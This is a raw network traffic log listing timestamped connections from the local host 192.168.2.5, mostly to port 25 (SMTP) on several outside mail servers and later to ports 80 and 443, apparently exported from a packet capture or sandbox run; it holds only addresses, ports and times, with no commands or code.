Feb 20, 2023 09:50:49.685194969 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:49.697242975 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.697381973 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.697498083 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.697716951 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.702866077 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.703134060 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.724347115 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.724507093 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.724695921 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.724839926 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.729954958 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.730206966 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.748111963 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:49.748620033 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:49.751410961 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.751447916 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.751729012 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.751915932 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.756859064 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.757112980 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.778461933 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.778537035 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.778655052 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.778836966 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.783854961 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.784043074 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.805378914 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.805435896 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.805587053 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.805785894 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.810735941 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.810982943 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.811238050 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:49.811654091 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:49.832235098 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.832390070 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.832566023 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.832768917 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.837634087 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.837888956 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.840749025 CET	25	49711	198.252.153.129	192.168.2.5
Feb 20, 2023 09:50:49.859272957 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.859414101 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.859571934 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.859788895 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.864557028 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.864793062 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.873895884 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:49.874340057 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:49.875278950 CET	49711	25	192.168.2.5	198.252.153.129
Feb 20, 2023 09:50:49.886241913 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.886363983 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.886445999 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.886569023 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.891463041 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.891607046 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.912951946 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.913081884 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.913193941 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.913350105 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.918370962 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.918685913 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.936446905 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:49.936917067 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:49.939676046 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.939851046 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.939910889 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.940051079 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.945380926 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.945609093 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.966536045 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.966583967 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.966732025 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.966850042 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.972325087 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.972532988 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.993370056 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.993412971 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.993731022 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.993865967 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.999063015 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:49.999103069 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.999504089 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:49.999605894 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.020467043 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:50.020507097 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.020741940 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:50.020961046 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.026300907 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.026745081 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.047329903 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:50.047502995 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.047763109 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:50.047929049 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.053683996 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.053997040 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.054174900 CET	25	49711	198.252.153.129	192.168.2.5
Feb 20, 2023 09:50:50.054295063 CET	49711	25	192.168.2.5	198.252.153.129
Feb 20, 2023 09:50:50.061501026 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:50.061980009 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:50.074407101 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:50.074495077 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.074891090 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.079505920 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:50.079580069 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:50.079701900 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:50.080714941 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.081088066 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.101610899 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.101836920 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.108045101 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.108274937 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.124957085 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:50.125557899 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:50.128468990 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.128691912 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.133666039 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:50.133758068 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:50.134974957 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.135185003 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.155515909 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.155736923 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.160152912 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:50.160229921 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:50.161900997 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.162311077 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.182573080 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.182687044 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.188514948 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:50.188999891 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:50.189078093 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.189419031 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.209484100 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.209752083 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.216126919 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.216379881 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.236597061 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.237006903 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.243169069 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.243480921 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.251336098 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:50.252204895 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:50.263873100 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.264250040 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.270190954 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.270509958 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.290932894 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.291265011 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.297174931 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.297512054 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.314294100 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:50.314968109 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:50.317960978 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.318180084 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.324292898 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.324583054 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.344995022 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.345263004 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.351375103 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.351619005 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.371952057 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.372554064 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.377340078 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:50.377862930 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:50.378350019 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.378643990 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.399198055 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.399470091 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.405287981 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.405606985 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.426189899 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.426440001 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.432427883 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.432692051 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.441085100 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:50.441745043 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:50.453157902 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.453435898 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.459333897 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.459629059 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.480176926 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.480460882 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.486305952 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.486574888 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.504434109 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:50.505068064 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:50.507054090 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.507375002 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.513225079 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.513546944 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.534096003 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.534481049 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.540153980 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.540446997 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.561265945 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.561469078 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.567105055 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.567476034 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.567744970 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:50.568331957 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:50.588191986 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.594239950 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.594815969 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.621589899 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.622144938 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.631377935 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:50.632210016 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:50.649357080 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.649640083 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.676573038 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.676858902 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.694899082 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:50.696053982 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:50.703687906 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.704153061 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.731508017 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.731960058 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.751966000 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.752036095 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.752115011 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.758377075 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:50.758625031 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.759305954 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:50.759598970 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.783380985 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.783454895 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.786339998 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.786982059 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.809957027 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.809987068 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.813642979 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.813966990 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.821739912 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:50.822644949 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:50.841257095 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.841375113 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.868170023 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.868524075 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.885406971 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:50.886466026 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:50.895275116 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.895623922 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:50.922457933 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:50.948895931 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:50.949953079 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:51.012358904 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:51.021006107 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:51.071139097 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:51.071139097 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:51.083956957 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:51.084094048 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:51.093377113 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:51.093427896 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:51.093504906 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:51.102802992 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:51.102878094 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:51.129437923 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:51.129487038 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:51.134078026 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:51.147011995 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:52.048188925 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:52.049141884 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:52.112138987 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:52.112195969 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:52.112648964 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:52.175188065 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:52.175298929 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:51:04.217564106 CET	49684	80	192.168.2.5	104.77.36.175
Feb 20, 2023 09:51:04.229437113 CET	80	49684	104.77.36.175	192.168.2.5
Feb 20, 2023 09:51:04.229630947 CET	49684	80	192.168.2.5	104.77.36.175
Feb 20, 2023 09:51:10.093270063 CET	49693	80	192.168.2.5	173.222.108.210
Feb 20, 2023 09:51:10.105171919 CET	80	49693	173.222.108.210	192.168.2.5
Feb 20, 2023 09:51:10.105325937 CET	49693	80	192.168.2.5	173.222.108.210
Feb 20, 2023 09:51:10.874197006 CET	49699	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:51:10.904480934 CET	443	49699	20.90.156.32	192.168.2.5
Feb 20, 2023 09:51:10.922458887 CET	49715	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:51:10.922513962 CET	443	49715	20.90.156.32	192.168.2.5
Feb 20, 2023 09:51:10.922610998 CET	49715	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:51:10.923886061 CET	49715	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:51:10.923906088 CET	443	49715	20.90.156.32	192.168.2.5
Feb 20, 2023 09:51:11.048140049 CET	443	49715	20.90.156.32	192.168.2.5
Feb 20, 2023 09:51:11.048285961 CET	49715	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:51:11.057415009 CET	49715	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:51:11.057437897 CET	443	49715	20.90.156.32	192.168.2.5
Feb 20, 2023 09:51:11.058139086 CET	443	49715	20.90.156.32	192.168.2.5
Feb 20, 2023 09:51:11.059425116 CET	49715	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:51:11.059464931 CET	443	49715	20.90.156.32	192.168.2.5
Feb 20, 2023 09:51:11.059504032 CET	49715	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:51:11.059510946 CET	443	49715	20.90.156.32	192.168.2.5
Feb 20, 2023 09:51:11.059794903 CET	49715	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:51:11.059803009 CET	443	49715	20.90.156.32	192.168.2.5
Feb 20, 2023 09:51:11.094820976 CET	443	49715	20.90.156.32	192.168.2.5
Feb 20, 2023 09:51:11.094957113 CET	443	49715	20.90.156.32	192.168.2.5
Feb 20, 2023 09:51:11.095024109 CET	49715	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:51:11.095110893 CET	49715	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:51:11.095130920 CET	443	49715	20.90.156.32	192.168.2.5
Feb 20, 2023 09:51:11.107858896 CET	49699	443	192.168.2.5	20.90.156.32
Feb 20, 2023 09:51:12.334301949 CET	80	49697	93.184.220.29	192.168.2.5
Feb 20, 2023 09:51:12.334506989 CET	49697	80	192.168.2.5	93.184.220.29
Feb 20, 2023 09:51:18.049573898 CET	49716	443	192.168.2.5	20.90.152.133
Feb 20, 2023 09:51:18.049654007 CET	443	49716	20.90.152.133	192.168.2.5
Feb 20, 2023 09:51:18.049751043 CET	49716	443	192.168.2.5	20.90.152.133
Feb 20, 2023 09:51:18.050797939 CET	49716	443	192.168.2.5	20.90.152.133
Feb 20, 2023 09:51:18.050827026 CET	443	49716	20.90.152.133	192.168.2.5
Feb 20, 2023 09:51:18.160687923 CET	443	49716	20.90.152.133	192.168.2.5
Feb 20, 2023 09:51:18.160953999 CET	49716	443	192.168.2.5	20.90.152.133
Feb 20, 2023 09:51:19.153655052 CET	49716	443	192.168.2.5	20.90.152.133
Feb 20, 2023 09:51:19.153712034 CET	443	49716	20.90.152.133	192.168.2.5
Feb 20, 2023 09:51:19.154316902 CET	443	49716	20.90.152.133	192.168.2.5
Feb 20, 2023 09:51:19.155529022 CET	49716	443	192.168.2.5	20.90.152.133
Feb 20, 2023 09:51:19.155551910 CET	443	49716	20.90.152.133	192.168.2.5
Feb 20, 2023 09:51:19.155591965 CET	49716	443	192.168.2.5	20.90.152.133
Feb 20, 2023 09:51:19.155603886 CET	443	49716	20.90.152.133	192.168.2.5
Feb 20, 2023 09:51:19.155760050 CET	49716	443	192.168.2.5	20.90.152.133
Feb 20, 2023 09:51:19.155770063 CET	443	49716	20.90.152.133	192.168.2.5
Feb 20, 2023 09:51:19.187985897 CET	443	49716	20.90.152.133	192.168.2.5
Feb 20, 2023 09:51:19.188359976 CET	443	49716	20.90.152.133	192.168.2.5
Feb 20, 2023 09:51:19.188483000 CET	49716	443	192.168.2.5	20.90.152.133
Feb 20, 2023 09:51:19.226501942 CET	49716	443	192.168.2.5	20.90.152.133
Feb 20, 2023 09:51:19.226552010 CET	443	49716	20.90.152.133	192.168.2.5
Feb 20, 2023 09:51:26.523319006 CET	49717	25	192.168.2.5	80.75.42.227
Feb 20, 2023 09:51:26.548063040 CET	25	49717	80.75.42.227	192.168.2.5
Feb 20, 2023 09:51:26.548263073 CET	49717	25	192.168.2.5	80.75.42.227
Feb 20, 2023 09:51:26.574506998 CET	25	49717	80.75.42.227	192.168.2.5
Feb 20, 2023 09:51:26.765542984 CET	49717	25	192.168.2.5	80.75.42.227
Feb 20, 2023 09:51:27.136867046 CET	49718	25	192.168.2.5	91.136.8.41
Feb 20, 2023 09:51:27.182739019 CET	25	49718	91.136.8.41	192.168.2.5
Feb 20, 2023 09:51:27.182847977 CET	49718	25	192.168.2.5	91.136.8.41
Feb 20, 2023 09:51:27.315160990 CET	49719	25	192.168.2.5	80.75.42.227
Feb 20, 2023 09:51:27.339114904 CET	25	49719	80.75.42.227	192.168.2.5
Feb 20, 2023 09:51:27.339273930 CET	49719	25	192.168.2.5	80.75.42.227
Feb 20, 2023 09:51:27.362147093 CET	25	49719	80.75.42.227	192.168.2.5
Feb 20, 2023 09:51:27.406101942 CET	49719	25	192.168.2.5	80.75.42.227
Feb 20, 2023 09:51:29.456075907 CET	25	49718	91.136.8.41	192.168.2.5
Feb 20, 2023 09:51:29.461004972 CET	49718	25	192.168.2.5	91.136.8.41
Feb 20, 2023 09:51:29.506625891 CET	25	49718	91.136.8.41	192.168.2.5
Feb 20, 2023 09:51:29.549271107 CET	25	49718	91.136.8.41	192.168.2.5
Feb 20, 2023 09:51:29.555224895 CET	49718	25	192.168.2.5	91.136.8.41
Feb 20, 2023 09:51:29.601078987 CET	25	49718	91.136.8.41	192.168.2.5
